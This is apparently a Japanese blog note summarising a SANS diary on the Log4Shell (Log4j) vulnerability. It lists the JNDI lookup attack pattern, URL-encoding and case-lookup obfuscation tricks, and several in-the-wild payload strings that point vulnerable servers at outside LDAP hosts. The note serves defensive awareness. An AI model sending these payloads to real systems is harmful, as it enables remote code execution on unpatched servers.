【ブログ】

◆Log4j / Log4Shell Followup: What we see and how to defend (and how to access our data) (SANS, 2021/12/11)
https://isc.sans.edu/forums/diary/Log4j+Log4Shell+Followup+What+we+see+and+how+to+defend+and+how+to+access+our+data/28122/

【詳細】

■攻撃パターン

${jndi:ldap://aa895bba3900.bingsearchlib.com:39356/a}

■難読化

◇URLエンコード

• $%7b => {
• $%7d => }

◇upper / lower

• ${lower:l} => l
• ${upper:a} => A

■難読化事例

/$%7Bjndi:ldap://45.130.229.168:1389/Exploit%7D
/$%7Bjndi:ldap://x-ios-validation.com.lc1wnt7yguuuk0qurdw600boffl59u.burpcollaborator.net%7D

${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

=> ${jndi:ldap://world80.log4j.binAryedge.io:80/callback}